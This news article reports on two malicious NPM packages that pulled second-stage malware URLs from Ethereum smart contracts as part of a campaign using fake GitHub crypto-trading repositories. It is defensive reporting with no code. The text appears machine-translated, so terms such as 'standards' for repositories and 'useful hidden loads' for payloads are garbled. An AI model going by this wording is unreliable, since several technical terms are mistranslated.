Ethereum has become the last front for software supply chain attacks.
Researchers from Reversinglabs earlier this week discovered two malicious NPM packages that used Ethereum smart contracts to hide harmful code, allowing malware to bypass traditional security checks.
NPM is a Package Manager for the Node.js execution environment and is considered to be the largest software register in the world, where developers can access and share code that contributes to millions of software.
The packages, “Colortoolsv2” and “Mimelib2”, were downloaded in the standard of node package manager widely used in July. They seemed to be simple public services at first glance, but in practice, they typed the Ethereum blockchain to recover hidden URLs that directed compromise systems to download second -stage malware.
By integrating these orders into an intelligent contract, the attackers disguised their activity as a legitimate blockchain trafficking, which makes detection more difficult.
“This is something that we have not seen before,” said reverse researcher Lucija Valentić in their report. “It highlights the rapid evolution of detection escape strategies by malicious actors who drag open source benchmarks and developers.”
The technique is based on an old playing book. Past attacks have used trust services like Github Gist, Google Drive or OneDrive to accommodate malicious ties. By taking advantage of Ethereum intelligent contracts rather, the attackers added a crypto flavored touch to an already dangerous supply chain.
The incident is part of a wider campaign. Reveversinglabs discovered the packages linked to the false GitHub standards that were pretended to be cryptocurrency trading robots. These references have been padded with manufactured commits, false user accounts and swollen star accounts to appear legitimate.
The developers who fired the code risked importing malware without being aware of it.
The risk of supply chain in open source crypto tools are not new. Last year, researchers reported more than 20 malicious campaigns targeting developers through standards such as NPM and Pypi.
Many were aimed at stealing portfolio references or installing cryptography minors. But the use of Ethereum intelligent contracts as a delivery mechanism shows that adversaries adapt quickly to mix in blockchain ecosystems.
One point to remember for developers is that popular commits or active maintainers can be traced, and even apparently harmless plans can transport useful hidden loads.
